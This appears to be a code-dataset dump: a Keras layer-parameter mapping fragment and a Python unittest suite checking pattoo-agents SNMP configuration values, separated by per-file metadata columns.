'kernel_regularizer': None,
'bias_regularizer': None,
'activity_regularizer': None,
'kernel_constraint': None,
'bias_constraint': None,
'kwargs': None},
'Conv2D': {'self': None,
'filters': get_filters,
'kernel_size': kernel_size_dispatch,
'strides': get_strides2D_and_dilation_rate_pool_size,
'padding': get_padding,
'data_format': get_data_format,
'dilation_rate': get_strides2D_and_dilation_rate_pool_size,
'groups': get_group,
'activation': get_activation,
'use_bias': get_bool,
'kernel_initializer': 'glorot_uniform',
'bias_initializer': 'zeros',
'kernel_regularizer': None,
'bias_regularizer': None,
'activity_regularizer': None,
'kernel_constraint': None,
'bias_constraint': None,
'kwargs': None},
'Conv3D': {'self': None,
'filters': get_filters,
'kernel_size': kernel_size_dispatch,
'strides': get_strides3D_and_dilation_rate_pool_size,
'padding': get_padding,
'data_format': get_data_format,
'dilation_rate': get_strides3D_and_dilation_rate_pool_size,
'groups': get_group,
'activation': get_activation,
'use_bias': get_bool,
'kernel_initializer': 'glorot_uniform',
'bias_initializer': 'zeros',
'kernel_regularizer': None,
'bias_regularizer': None,
'activity_regularizer': None,
'kernel_constraint': None,
'bias_constraint': None,
'kwargs': None},
'Conv1DTranspose': {'self': None,
'filters': get_filters,
'kernel_size': kernel_size_dispatch,
'strides': get_stride_or_dilation_rate_pool_size,
'padding': get_padding,
'output_padding': output_padding_dispatch_for_Transpose,
'data_format': get_data_format,
'dilation_rate': get_stride_or_dilation_rate_pool_size,
'activation': get_activation,
'use_bias': get_bool,
'kernel_initializer': 'glorot_uniform',
'bias_initializer': 'zeros',
'kernel_regularizer': None,
'bias_regularizer': None,
'activity_regularizer': None,
'kernel_constraint': None,
'bias_constraint': None,
'kwargs': None},
'Conv2DTranspose': {'self': None,
'filters': get_filters,
'kernel_size': kernel_size_dispatch,
'strides':get_strides2D_and_dilation_rate_pool_size,
'padding': get_padding,
'output_padding': output_padding_dispatch_for_Transpose,
'data_format': get_data_format,
'dilation_rate': get_strides2D_and_dilation_rate_pool_size,
'activation': get_activation,
'use_bias': get_bool,
'kernel_initializer': 'glorot_uniform',
'bias_initializer': 'zeros',
'kernel_regularizer': None,
'bias_regularizer': None,
'activity_regularizer': None,
'kernel_constraint': None,
'bias_constraint': None,
'kwargs': None},
'Conv3DTranspose': {'self': None,
'filters': get_filters,
'kernel_size': kernel_size_dispatch,
'strides':get_strides3D_and_dilation_rate_pool_size,
'padding': get_padding,
'output_padding': output_padding_dispatch_for_Transpose,
'data_format': get_data_format,
'dilation_rate': get_strides3D_and_dilation_rate_pool_size,
'activation': get_activation,
'use_bias': get_bool,
'kernel_initializer': 'glorot_uniform',
'bias_initializer': 'zeros',
'kernel_regularizer': None,
'bias_regularizer': None,
'activity_regularizer': None,
'kernel_constraint': None,
'bias_constraint': None,
'kwargs': None},
'SeparableConv1D': {'self': None,
'filters': get_filters,
'kernel_size': kernel_size_dispatch,
'strides': get_stride_or_dilation_rate_pool_size,
'padding': get_padding,
'data_format': get_data_format,
'dilation_rate': get_stride_or_dilation_rate_pool_size,
'depth_multiplier': get_depth_multiplier,
'activation': get_activation,
'use_bias': get_bool,
'depthwise_initializer': 'glorot_uniform',
'pointwise_initializer': 'glorot_uniform',
'bias_initializer': 'zeros',
'depthwise_regularizer': None,
'pointwise_regularizer': None,
'bias_regularizer': None,
'activity_regularizer': None,
'depthwise_constraint': None,
'pointwise_constraint': None,
'bias_constraint': None,
'kwargs': None},
'SeparableConv2D': {'self': None,
'filters': get_filters,
'kernel_size': kernel_size_dispatch,
'strides': get_strides2D_and_dilation_rate_pool_size,
'padding': get_padding,
'data_format': get_data_format,
'dilation_rate': get_strides2D_and_dilation_rate_pool_size,
'depth_multiplier': get_depth_multiplier,
'activation': get_activation,
'use_bias': get_bool,
'depthwise_initializer': 'glorot_uniform',
'pointwise_initializer': 'glorot_uniform',
'bias_initializer': 'zeros',
'depthwise_regularizer': None,
'pointwise_regularizer': None,
'bias_regularizer': None,
'activity_regularizer': None,
'depthwise_constraint': None,
'pointwise_constraint': None,
'bias_constraint': None,
'kwargs': None},
'DepthwiseConv2D': {'self': None,
'kernel_size': kernel_size_dispatch,
'strides': get_strides2D_and_dilation_rate_pool_size,
'padding': get_padding,
'depth_multiplier':get_depth_multiplier,
'data_format': get_data_format,
'dilation_rate':get_strides2D_and_dilation_rate_pool_size,
'activation': get_activation,
'use_bias': get_bool,
'depthwise_initializer': 'glorot_uniform',
'bias_initializer': 'zeros',
'depthwise_regularizer': None,
'bias_regularizer': None,
'activity_regularizer': None,
'depthwise_constraint': None,
'bias_constraint': None,
'kwargs': None},
'UpSampling1D': {'self': None,
'size': get_size1D_and_padding,
'kwargs': None},
'UpSampling2D': {'self': None,
'size': get_size2D_and_padding,
'data_format': get_data_format,
'interpolation': get_interpolation,
'kwargs': None},
'UpSampling3D': {'self': None,
'size': get_size3D_and_padding,
'data_format': get_data_format,
'kwargs': None},
'ZeroPadding1D': {'self': None,
'padding': get_size1D_and_padding,
'kwargs': None},
'ZeroPadding2D': {'self': None,
'padding': get_size2D_and_padding,
'data_format': get_data_format,
'kwargs': None},
'ZeroPadding3D': {'self': None,
'padding':get_size3D_and_padding,
'data_format': get_data_format,
'kwargs': None},
'Cropping1D': {'self': None,
'cropping':get_croping1D,
'kwargs': None},
'Cropping2D': {'self': None,
'cropping': get_croping2D,
'data_format': get_data_format,
'kwargs': None},
'Cropping3D': {'self': None,
'cropping': get_croping3D,
'data_format': get_data_format,
'kwargs': None},
'Masking': {'self': None,
'mask_value': get_value,
'kwargs': None},
# 'Dropout': {'self': None,
# 'rate': None,
# 'noise_shape': None,
# 'seed': None,
# 'kwargs': None},
# 'SpatialDropout1D': {'self': None,
# 'rate': None,
# 'kwargs': None},
# 'SpatialDropout2D': {'self': None,
# 'rate': None,
# 'data_format': None,
# 'kwargs': None},
# 'SpatialDropout3D': {'self': None,
# 'rate': None,
# 'data_format': None,
# 'kwargs': None},
'Activation': {'self': None,
'activation': get_activation,
'kwargs': None},
'Reshape': {'self': None,
'target_shape': get_target_shape,
'kwargs': None},
'Permute': {'self': None,
'dims': get_next_permute,
'kwargs': None},
'Flatten': {'self': None,
'data_format': get_data_format,
'kwargs': None},
'RepeatVector': {'self': None,
'n': get_value,
'kwargs': None},
# 'Lambda': {'self': None,
# 'function': None,
# 'output_shape': None,
# 'mask': None,
# 'arguments': None,
# 'kwargs': None},
'Dense': {'self': None,
'units': get_units,
'activation': get_activation,
'use_bias': get_bool,
'kernel_initializer': 'glorot_uniform',
'bias_initializer': 'zeros',
'kernel_regularizer': None,
'bias_regularizer': None,
'activity_regularizer': None,
'kernel_constraint': None,
'bias_constraint': None,
'kwargs': None},
'ActivityRegularization': {'self': None,
'l1': get_value,
'l2': get_value,
'kwargs': None},
'AdditiveAttention': {'self': None,
'use_scale': True,
'kwargs': None},
'Attention': {'self': None,
'use_scale': get_bool,
'kwargs': None},
'Embedding': {'self': None,
'input_dim': get_value,
'output_dim': get_value,
'embeddings_initializer': 'uniform',
'embeddings_regularizer': None,
'activity_regularizer': None,
'embeddings_constraint': None,
'mask_zero': get_bool,
'input_length': get_value,
'kwargs': None},
'LocallyConnected1D': {'self': None,
'filters': get_filters,
'kernel_size': kernel_size_dispatch,
'strides': get_stride_or_dilation_rate_pool_size,
'padding': get_padding,
'data_format': get_data_format,
'activation': get_activation,
'use_bias': get_bool,
'kernel_initializer': 'glorot_uniform',
'bias_initializer': 'zeros',
'kernel_regularizer': None,
'bias_regularizer': None,
'activity_regularizer': None,
'kernel_constraint': None,
'bias_constraint': None,
'implementation': get_implementation,
'kwargs': None},
'LocallyConnected2D': {'self': None,
'filters': get_filters,
'kernel_size': kernel_size_dispatch,
'strides': get_strides2D_and_dilation_rate_pool_size,
'padding': get_padding,
'data_format': get_data_format,
'activation': get_activation,
'use_bias': get_bool,
'kernel_initializer': 'glorot_uniform',
'bias_initializer': 'zeros',
'kernel_regularizer': None,
'bias_regularizer': None,
'activity_regularizer': None,
'kernel_constraint': None,
'bias_constraint': None,
'implementation': get_implementation,
'kwargs': None},
'Add': {'self': None,
'kwargs': None},
'Subtract': {'self': None,
'kwargs': None},
'Multiply': {'self': None,
'kwargs': None},
'Average': {'self': None,
'kwargs': None},
'Maximum': {'self': None,
'kwargs': None},
'Minimum': {'self': None,
'kwargs': None},
'Concatenate': {'self': None,
'axis': get_axis,#-1
'kwargs': None},
'Dot': {'self': None,
'axes': get_axes,
'normalize': get_bool,
'kwargs': None},
'add': {'args': None,
'kwargs': None},
'subtract': {'args': None,
'kwargs': None},
'multiply': {'args': None,
'kwargs': None},
'average': {'args': None,
'kwargs': None},
'maximum': {'args': None,
'kwargs': None},
'minimum': {'args': None,
'kwargs': None},
'concatenate': {'args': None,
'kwargs': None},
'dot': {'args': None,
'kwargs': None},
# 'AlphaDropout': {'self': None,
# 'rate': None,
# 'noise_shape': None,
# 'seed': None,
# 'kwargs': None},
'GaussianNoise': {'self': None,
'stddev': get_value,
'kwargs': None},
'GaussianDropout': {'self': None,
'rate': get_value,
'kwargs': None},
'LayerNormalization': {'self': None,
'axis': get_axis,#-1
'epsilon': get_epsilon,#0.001
'center': get_bool,
'scale': get_bool,
'beta_initializer': 'zeros',
'gamma_initializer': 'ones',
'beta_regularizer': None,
'gamma_regularizer': None,
'beta_constraint': None,
'gamma_constraint': None,
'trainable': True,
'name': None,
'kwargs': None},
'BatchNormalization': {'self': None,
'axis': get_axis,#-1
'momentum': get_value,#0.99
'epsilon': get_epsilon,#0.001
'center': get_bool,
'scale': get_bool,
'beta_initializer': 'zeros',
'gamma_initializer': 'ones',
'moving_mean_initializer': 'zeros',
'moving_variance_initializer': 'ones',
'beta_regularizer': None,
'gamma_regularizer': None,
'beta_constraint': None,
'gamma_constraint': None,
'renorm': get_bool,
'renorm_clipping': None,
'renorm_momentum': get_value,#0.99
'fused': None,
'trainable': True,
'virtual_batch_size': None,
'adjustment': None,
'name': None,
'kwargs': None},
'MaxPooling1D': {'self': None,
'pool_size': get_stride_or_dilation_rate_pool_size,
'strides': get_stride_or_dilation_rate_pool_size,
'padding': get_padding,
'data_format': get_data_format,
'kwargs': None},
'MaxPooling2D': {'self': None,
'pool_size': get_strides2D_and_dilation_rate_pool_size,
'strides': get_strides2D_and_dilation_rate_pool_size,
'padding':get_padding,
'data_format': get_data_format,
'kwargs': None},
'MaxPooling3D': {'self': None,
'pool_size':get_strides3D_and_dilation_rate_pool_size,
'strides': get_strides3D_and_dilation_rate_pool_size,
'padding': get_padding,
'data_format': get_data_format,
'kwargs': None},
'AveragePooling1D': {'self': None,
'pool_size': get_stride_or_dilation_rate_pool_size,
'strides': get_stride_or_dilation_rate_pool_size,
'padding': get_padding,
'data_format': get_data_format,
'kwargs': None},
'AveragePooling2D': {'self': None,
'pool_size': get_strides2D_and_dilation_rate_pool_size,
'strides': get_strides2D_and_dilation_rate_pool_size,
'padding': get_padding,
'data_format': get_data_format,
'kwargs': None},
'AveragePooling3D': {'self': None,
'pool_size': get_strides3D_and_dilation_rate_pool_size,
'strides': get_strides3D_and_dilation_rate_pool_size,
'padding': get_padding,
'data_format': get_data_format,
'kwargs': None},
'GlobalAveragePooling1D': {'self': None,
'data_format': get_data_format,
'kwargs': None},
'GlobalAveragePooling2D': {'self': None,
'data_format': get_data_format,
'kwargs': None},
'GlobalAveragePooling3D': {'self': None,
'data_format': get_data_format,
'kwargs': None},
'GlobalMaxPooling1D': {'self': None,
'data_format': get_data_format,
'kwargs': None},
'GlobalMaxPooling2D': {'self': None,
'data_format': get_data_format,
'kwargs': None},
'GlobalMaxPooling3D': {'self': None,
'data_format': get_data_format,
'kwargs': None},
# 'RNN': {'self': None,
# 'cell': None,
# 'return_sequences': False,
# 'return_state': False,
# 'go_backwards': False,
# 'stateful': False,
# 'unroll': False,
# 'time_major': False,
# 'kwargs': None},
# 'AbstractRNNCell': {'self': None,
# 'trainable': True,
# 'name': None,
# 'dtype': None,
# 'dynamic': get_bool,
# 'kwargs': None},
# 'StackedRNNCells': {'self': None,
# 'cells': None,
# 'kwargs': None},
# 'SimpleRNNCell': {'self': None,
# 'units': None,
# 'activation': 'tanh',
# 'use_bias': True,
# 'kernel_initializer': 'glorot_uniform',
# 'recurrent_initializer': 'orthogonal',
# 'bias_initializer': 'zeros',
# 'kernel_regularizer': None,
# 'recurrent_regularizer': None,
# 'bias_regularizer': None,
# 'kernel_constraint': None,
# 'recurrent_constraint': None,
# 'bias_constraint': None,
# 'dropout': 0.0,
# 'recurrent_dropout': 0.0,
# 'kwargs': None},
'SimpleRNN': {'self': None,
'units': get_units,
'activation': get_activation,
'use_bias': get_bool,
'kernel_initializer': 'glorot_uniform',
'recurrent_initializer': 'orthogonal',
'bias_initializer': 'zeros',
'kernel_regularizer': None,
'recurrent_regularizer': None,
'bias_regularizer': None,
'activity_regularizer': None,
'kernel_constraint': None,
'recurrent_constraint': None,
'bias_constraint': None,
'dropout': get_value,
'recurrent_dropout':get_value,
'return_sequences': get_bool,
'return_state': get_bool,
'go_backwards': get_bool,
'stateful': get_bool,
'unroll': get_bool,
'kwargs': None},
'GRU': {'self': None,
'units': get_units,
'activation': get_activation,
'recurrent_activation': get_activation,
'use_bias': get_bool,
'kernel_initializer': 'glorot_uniform',
'recurrent_initializer': 'orthogonal',
'bias_initializer': 'zeros',
'kernel_regularizer': None,
'recurrent_regularizer': None,
'bias_regularizer': None,
'activity_regularizer': None,
'kernel_constraint': None,
'recurrent_constraint': None,
'bias_constraint': None,
'dropout': get_bool,
'recurrent_dropout': get_bool,
'implementation': get_implementation,
'return_sequences': get_bool,
'return_state': get_bool,
'go_backwards': get_bool,
'stateful': get_bool,
'unroll': get_bool,
'time_major': get_bool,
'reset_after': get_bool,
'kwargs': None},
# 'GRUCell': {'self': None,
# 'units': None,
# 'activation': 'tanh',
# 'recurrent_activation': 'sigmoid',
# 'use_bias': True,
# 'kernel_initializer': 'glorot_uniform',
# 'recurrent_initializer': 'orthogonal',
# 'bias_initializer': 'zeros',
# 'kernel_regularizer': None,
# 'recurrent_regularizer': None,
# 'bias_regularizer': None,
# 'kernel_constraint': None,
# 'recurrent_constraint': None,
# 'bias_constraint': None,
# 'dropout': 0.0,
# 'recurrent_dropout': 0.0,
# 'implementation': 2,
# 'reset_after': True,
# 'kwargs': None},
'LSTM': {'self': None,
'units': get_units,
'activation': get_activation,
'recurrent_activation': get_activation,
'use_bias': get_bool,
'kernel_initializer': 'glorot_uniform',
'recurrent_initializer': 'orthogonal',
'bias_initializer': 'zeros',
'unit_forget_bias': get_bool,
'kernel_regularizer': None,
'recurrent_regularizer': None,
'bias_regularizer': None,
'activity_regularizer': None,
'kernel_constraint': None,
'recurrent_constraint': None,
'bias_constraint': None,
'dropout':get_value,
'recurrent_dropout':get_value,
'implementation': get_implementation,
'return_sequences': get_bool,
'return_state': get_bool,
'go_backwards': get_bool,
'stateful': get_bool,
'time_major': get_bool,
'unroll': get_bool,
'kwargs': None},
# 'LSTMCell': {'self': None,
# 'units': None,
# 'activation': 'tanh',
# 'recurrent_activation': 'sigmoid',
# 'use_bias': True,
# 'kernel_initializer': 'glorot_uniform',
# 'recurrent_initializer': 'orthogonal',
# 'bias_initializer': 'zeros',
# 'unit_forget_bias': True,
# 'kernel_regularizer': None,
# 'recurrent_regularizer': None,
# 'bias_regularizer': None,
# 'kernel_constraint': None,
# 'recurrent_constraint': None,
# 'bias_constraint': None,
# 'dropout': 0.0,
# 'recurrent_dropout': 0.0,
# 'implementation': 2,
# 'kwargs': None},
# 'ConvLSTM2D': {'self': None,
# 'filters': None,
# 'kernel_size': None,
# 'strides': (1,
# 1),
# 'padding': 'valid',
# 'data_format': None,
# 'dilation_rate': (1,
# 1),
# 'activation': 'tanh',
# 'recurrent_activation': 'hard_sigmoid',
# 'use_bias': True,
# 'kernel_initializer': 'glorot_uniform',
# 'recurrent_initializer': 'orthogonal',
# 'bias_initializer': 'zeros',
# 'unit_forget_bias': True,
# 'kernel_regularizer': None,
# 'recurrent_regularizer': None,
# 'bias_regularizer': None,
# 'activity_regularizer': None,
# 'kernel_constraint': None,
# 'recurrent_constraint': None,
# 'bias_constraint': None,
# 'return_sequences': False,
# 'return_state': False,
# 'go_backwards': False,
# 'stateful': False,
# 'dropout': 0.0,
# 'recurrent_dropout': 0.0,
# 'kwargs': None}
}
| 38.627778
| 80
| 0.479038
| 2,179
| 27,812
| 5.751262
| 0.094998
| 0.067028
| 0.036866
| 0.051069
| 0.782397
| 0.767316
| 0.751835
| 0.741143
| 0.736355
| 0.693505
| 0
| 0.006753
| 0.403639
| 27,812
| 719
| 81
| 38.681502
| 0.748824
| 0.177118
| 0
| 0.763672
| 1
| 0
| 0.285387
| 0.023746
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.001953
| 0
| 0.001953
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
22414412694ba19cf4d0ea9aa5e81514793b492f
| 15,412
|
py
|
Python
|
tests/test_pattoo_agents/snmp/test_configuration.py
|
palisadoes/pattoo-agents
|
d73453ceac1747573dfbcad4da724325e86b208d
|
[
"Apache-2.0"
] | null | null | null |
tests/test_pattoo_agents/snmp/test_configuration.py
|
palisadoes/pattoo-agents
|
d73453ceac1747573dfbcad4da724325e86b208d
|
[
"Apache-2.0"
] | null | null | null |
tests/test_pattoo_agents/snmp/test_configuration.py
|
palisadoes/pattoo-agents
|
d73453ceac1747573dfbcad4da724325e86b208d
|
[
"Apache-2.0"
] | null | null | null |
#!/usr/bin/env python3
"""Test the class_oid module."""
import sys
import unittest
import os
# Try to create a working PYTHONPATH
EXEC_DIR = os.path.dirname(os.path.realpath(__file__))
ROOT_DIR = os.path.abspath(os.path.join(
os.path.abspath(os.path.join(
os.path.abspath(os.path.join(
EXEC_DIR, os.pardir)), os.pardir)), os.pardir))
_EXPECTED = (
'{0}pattoo-agents{0}tests{0}test_pattoo_agents{0}snmp'.format(os.sep))
if EXEC_DIR.endswith(_EXPECTED) is True:
# We need to prepend the path in case PattooShared has been installed
# elsewhere on the system using PIP. This could corrupt expected results
sys.path.insert(0, ROOT_DIR)
else:
print('''This script is not installed in the "{0}" directory. Please fix.\
'''.format(_EXPECTED))
sys.exit(2)
# Pattoo imports
from pattoo_shared.variables import PollingPoint, TargetPollingPoints
from pattoo_agents.snmp import configuration
from pattoo_agents.snmp.variables import SNMPVariable
from tests.libraries.configuration import UnittestConfig
class TestConfigSNMP(unittest.TestCase):
"""Checks all ConfigSNMP methods."""
##########################################################################
# Initialize variable class
##########################################################################
config = configuration.ConfigSNMP()
def test___init__(self):
"""Testing function __init__."""
pass
def test_polling_interval(self):
"""Test pattoo_shared.Config inherited method polling_interval."""
# Initialize key values
expected = 912
# Test
result = self.config.polling_interval()
self.assertEqual(result, expected)
def test_snmpvariables(self):
"""Testing function snmpvariables."""
# Initialize key variables
result = self.config.snmpvariables()
# Test
self.assertEqual(isinstance(result, list), True)
self.assertEqual(len(result), 1)
# Test the only SNMPVariable in the result
snmpvariable = result[0]
self.assertEqual(isinstance(snmpvariable, SNMPVariable), True)
authvariable = snmpvariable.snmpauth
self.assertEqual(authvariable.community, '8gfljtrwer')
self.assertEqual(authvariable.port, 161)
self.assertEqual(authvariable.version, 2)
self.assertEqual(authvariable.authpassword, None)
self.assertEqual(authvariable.authprotocol, None)
self.assertEqual(authvariable.privpassword, None)
self.assertEqual(authvariable.privprotocol, None)
self.assertEqual(authvariable.secname, None)
def test_target_polling_points(self):
"""Testing function target_polling_points."""
# Initialize key variables.
result = self.config.target_polling_points()
oids = ['.1.3.6.1.2.1.2.2.1.10', '.1.3.6.1.2.1.2.2.1.16']
# Test
self.assertEqual(isinstance(result, list), True)
self.assertEqual(len(result), 1)
# Test each dpt
item = result[0]
self.assertEqual(isinstance(item, TargetPollingPoints), True)
self.assertEqual(item.target, 'localhost')
for index, value in enumerate(item.data):
self.assertEqual(isinstance(value, PollingPoint), True)
self.assertEqual(value.address, oids[index])
self.assertEqual(value.multiplier, 8)
def test_language(self):
"""Test pattoo_shared.Config inherited method language."""
# Initialize key values
expected = 'abc'
# Test
result = self.config.language()
self.assertEqual(result, expected)
def test_agent_api_ip_address(self):
"""Test pattoo_shared.Config inherited method agent_api_ip_address."""
# Initialize key values
expected = '127.0.0.11'
# Test
result = self.config.agent_api_ip_address()
self.assertEqual(result, expected)
def test_agent_api_ip_bind_port(self):
"""Test pattoo_shared.Config inherited method agent_api_ip_bind_port."""
# Initialize key values
expected = 50001
# Test
result = self.config.agent_api_ip_bind_port()
self.assertEqual(result, expected)
def test_agent_api_uri(self):
"""Test pattoo_shared.Config inherited method api_uri."""
# Initialize key values
expected = '/pattoo/api/v1/agent/receive'
# Test
result = self.config.agent_api_uri()
self.assertEqual(result, expected)
def test_agent_api_server_url(self):
"""Test pattoo_shared.Config inherited method agent_api_server_url."""
# Initialize key values
expected = 'http://127.0.0.11:50001/pattoo/api/v1/agent/receive/123'
agent_id = 123
# Test
result = self.config.agent_api_server_url(agent_id)
self.assertEqual(result, expected)
def test_web_api_ip_address(self):
"""Testing method / function web_api_ip_address."""
# Test
result = self.config.web_api_ip_address()
self.assertEqual(result, '127.0.0.12')
def test_web_api_ip_bind_port(self):
"""Testing method / function web_api_ip_bind_port."""
# Test
result = self.config.web_api_ip_bind_port()
self.assertEqual(result, 50002)
def test_web_api_server_url(self):
"""Testing method / function web_api_server_url."""
# Test
result = self.config.web_api_server_url()
self.assertEqual(
result, 'http://127.0.0.12:50002/pattoo/api/v1/web/graphql')
def test_daemon_directory(self):
"""Test pattoo_shared.Config inherited method daemon_directory."""
# Nothing should happen. Directory exists in testing.
_ = self.config.daemon_directory()
def test_log_directory(self):
"""Test pattoo_shared.Config inherited method log_directory."""
# Nothing should happen. Directory exists in testing.
_ = self.config.log_directory()
def test_log_file(self):
"""Test pattoo_shared.Config inherited method log_file."""
# Initialize key values
expected = '{1}{0}pattoo.log'.format(
os.sep, self.config.log_directory())
# Test
result = self.config.log_file()
self.assertEqual(result, expected)
def test_log_file_api(self):
"""Test pattoo_shared.Config inherited method log_file_api."""
# Initialize key values
expected = '{1}{0}pattoo-api.log'.format(
os.sep, self.config.log_directory())
# Test
result = self.config.log_file_api()
self.assertEqual(result, expected)
def test_log_level(self):
"""Test pattoo_shared.Config inherited method log_level."""
# Initialize key values
expected = 'debug'
# Test
result = self.config.log_level()
self.assertEqual(result, expected)
def test_log_file_daemon(self):
"""Test pattoo_shared.Config inherited method log_file_daemon."""
# Initialize key values
expected = '{1}{0}pattoo-daemon.log'.format(
os.sep, self.config.log_directory())
# Test
result = self.config.log_file_daemon()
self.assertEqual(result, expected)
def test_cache_directory(self):
"""Test pattoo_shared.Config inherited method cache_directory."""
# Nothing should happen. Directory exists in testing.
_ = self.config.cache_directory()
def test_agent_cache_directory(self):
"""Test pattoo_shared.Config inherited method agent_cache_directory."""
# Initialize key values
agent_id = 123
expected = '{1}{0}{2}'.format(
os.sep, self.config.cache_directory(), agent_id)
# Test
result = self.config.agent_cache_directory(agent_id)
self.assertEqual(result, expected)
class TestConfigSNMPIfMIB(unittest.TestCase):
"""Checks all ConfigSNMPIfMIB methods."""
##########################################################################
# Initialize variable class
##########################################################################
config = configuration.ConfigSNMPIfMIB()
def test___init__(self):
"""Testing function __init__."""
pass
def test_polling_interval(self):
"""Test pattoo_shared.Config inherited method polling_interval."""
# Initialize key values
expected = 7846
# Test
result = self.config.polling_interval()
self.assertEqual(result, expected)
def test_snmpvariables(self):
"""Testing function snmpvariables."""
# Initialize key variables
result = self.config.snmpvariables()
# Test
self.assertEqual(isinstance(result, list), True)
self.assertEqual(len(result), 1)
# Test the only SNMPVariable in the result
snmpvariable = result[0]
self.assertEqual(isinstance(snmpvariable, SNMPVariable), True)
authvariable = snmpvariable.snmpauth
self.assertEqual(authvariable.community, None)
self.assertEqual(authvariable.port, 161)
self.assertEqual(authvariable.version, 3)
self.assertEqual(authvariable.authpassword, '092df34')
self.assertEqual(authvariable.authprotocol, 'MD5')
self.assertEqual(authvariable.privpassword, '987dee1234')
self.assertEqual(authvariable.privprotocol, 'DES')
self.assertEqual(authvariable.secname, '0981s23df')
def test_target_polling_points(self):
"""Testing function oidvariables."""
# Initialize key variables.
result = self.config.target_polling_points()
oids = ['.1.3.6.1.2.1.2.2.1.14', '.1.3.6.1.2.1.2.2.1.20']
# Test
self.assertEqual(isinstance(result, list), True)
self.assertEqual(len(result), 1)
# Test each dpt
item = result[0]
self.assertEqual(isinstance(item, TargetPollingPoints), True)
self.assertEqual(item.target, 'localhost')
for index, value in enumerate(item.data):
self.assertEqual(isinstance(value, PollingPoint), True)
self.assertEqual(value.address, oids[index])
self.assertEqual(value.multiplier, 8)
def test_language(self):
"""Test pattoo_shared.Config inherited method language."""
# Initialize key values
expected = 'abc'
# Test
result = self.config.language()
self.assertEqual(result, expected)
def test_agent_api_ip_address(self):
"""Test pattoo_shared.Config inherited method agent_api_ip_address."""
# Initialize key values
expected = '127.0.0.11'
# Test
result = self.config.agent_api_ip_address()
self.assertEqual(result, expected)
def test_agent_api_ip_bind_port(self):
"""Test pattoo_shared.Config inherited method agent_api_ip_bind_port."""
# Initialize key values
expected = 50001
# Test
result = self.config.agent_api_ip_bind_port()
self.assertEqual(result, expected)
def test_agent_api_uri(self):
"""Test pattoo_shared.Config inherited method api_uri."""
# Initialize key values
expected = '/pattoo/api/v1/agent/receive'
# Test
result = self.config.agent_api_uri()
self.assertEqual(result, expected)
def test_agent_api_server_url(self):
"""Test pattoo_shared.Config inherited method agent_api_server_url."""
# Initialize key values
expected = 'http://127.0.0.11:50001/pattoo/api/v1/agent/receive/123'
agent_id = 123
# Test
result = self.config.agent_api_server_url(agent_id)
self.assertEqual(result, expected)
def test_web_api_ip_address(self):
"""Testing method / function web_api_ip_address."""
# Test
result = self.config.web_api_ip_address()
self.assertEqual(result, '127.0.0.12')
def test_web_api_ip_bind_port(self):
"""Testing method / function web_api_ip_bind_port."""
# Test
result = self.config.web_api_ip_bind_port()
self.assertEqual(result, 50002)
def test_web_api_server_url(self):
"""Testing method / function web_api_server_url."""
# Test
result = self.config.web_api_server_url()
self.assertEqual(
result, 'http://127.0.0.12:50002/pattoo/api/v1/web/graphql')
def test_daemon_directory(self):
"""Test pattoo_shared.Config inherited method daemon_directory."""
# Nothing should happen. Directory exists in testing.
_ = self.config.daemon_directory()
def test_log_directory(self):
"""Test pattoo_shared.Config inherited method log_directory."""
# Nothing should happen. Directory exists in testing.
_ = self.config.log_directory()
def test_log_file(self):
"""Test pattoo_shared.Config inherited method log_file."""
# Initialize key values
expected = '{1}{0}pattoo.log'.format(
os.sep, self.config.log_directory())
# Test
result = self.config.log_file()
self.assertEqual(result, expected)
def test_log_file_api(self):
"""Test pattoo_shared.Config inherited method log_file_api."""
# Initialize key values
expected = '{1}{0}pattoo-api.log'.format(
os.sep, self.config.log_directory())
# Test
result = self.config.log_file_api()
self.assertEqual(result, expected)
def test_log_level(self):
"""Test pattoo_shared.Config inherited method log_level."""
# Initialize key values
expected = 'debug'
# Test
result = self.config.log_level()
self.assertEqual(result, expected)
def test_log_file_daemon(self):
"""Test pattoo_shared.Config inherited method log_file_daemon."""
# Initialize key values
expected = '{1}{0}pattoo-daemon.log'.format(
os.sep, self.config.log_directory())
# Test
result = self.config.log_file_daemon()
self.assertEqual(result, expected)
def test_cache_directory(self):
"""Test pattoo_shared.Config inherited method cache_directory."""
# Nothing should happen. Directory exists in testing.
_ = self.config.cache_directory()
def test_agent_cache_directory(self):
"""Test pattoo_shared.Config inherited method agent_cache_directory."""
# Initialize key values
agent_id = 123
expected = '{1}{0}{2}'.format(
os.sep, self.config.cache_directory(), agent_id)
# Test
result = self.config.agent_cache_directory(agent_id)
self.assertEqual(result, expected)
class TestBasicFunctions(unittest.TestCase):
"""Checks all ConfigSNMP methods."""
##########################################################################
# Initialize variable class
##########################################################################
def test__validate_snmp(self):
"""Testing function _validate_snmp."""
pass
def test__validate_oids(self):
"""Testing function _validate_oids."""
pass
if __name__ == '__main__':
# Make sure the environment is OK to run unittests
UnittestConfig().create()
# Do the unit test
unittest.main()
| 35.027273
| 80
| 0.63483
| 1,754
| 15,412
| 5.375143
| 0.110604
| 0.101824
| 0.054306
| 0.059398
| 0.839945
| 0.839945
| 0.832732
| 0.832732
| 0.823186
| 0.793063
| 0
| 0.019905
| 0.233974
| 15,412
| 439
| 81
| 35.107062
| 0.778672
| 0.249546
| 0
| 0.792793
| 0
| 0.018018
| 0.067135
| 0.022009
| 0
| 0
| 0
| 0
| 0.288288
| 1
| 0.189189
| false
| 0.036036
| 0.031532
| 0
| 0.243243
| 0.004505
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
224cfd0e336da84f7f64cdb4e13747d8209ac826
| 379
|
py
|
Python
|
efficient_rl/agents/__init__.py
|
rlagywjd802/efficient_rl
|
6a82bfc10d814f5d36a7c211d645aa35ea380acf
|
[
"MIT"
] | 8
|
2020-06-25T10:16:48.000Z
|
2022-02-15T09:12:04.000Z
|
efficient_rl/agents/__init__.py
|
rlagywjd802/efficient_rl
|
6a82bfc10d814f5d36a7c211d645aa35ea380acf
|
[
"MIT"
] | null | null | null |
